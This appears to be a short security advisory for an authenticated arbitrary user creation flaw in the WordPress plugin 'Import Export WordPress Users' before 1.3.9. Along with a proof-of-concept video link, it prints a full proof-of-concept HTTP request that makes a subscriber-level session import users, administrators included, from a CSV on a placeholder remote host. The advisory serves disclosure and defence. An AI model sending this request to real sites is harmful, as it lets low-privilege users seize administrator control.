Import Export WordPress Users < 1.3.9 - Authenticated Arbitrary User Creation

2020-03-1100:00:00

Chloe Chamberland

0.001 Low

EPSS

Percentile

44.1%

JSON

“The flaw allowed anybody with subscriber-level access or above to import new users via a CSV file, including administrative-level users” providing subscriber-level users and above with the ability to escalate their privileges.

POST /wp-admin/admin-ajax.php?import_page=wordpress_hf_user_csv&step=3 HTTP/1.1
Host: EXAMPLE.com
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
Origin: http://EXAMPLE.com
Referer: http://EXAMPLE.com/wp-admin/admin.php?import=wordpress_hf_user_csv&step=2
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: {SUB+ COOKIES}
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 133

action=user_csv_import_request&file=http://REMOTESITE.com/USERS.csv&start_pos=0&end_pos=

PoC video: https://www.youtube.com/watch?v=0ejJwbFJpcU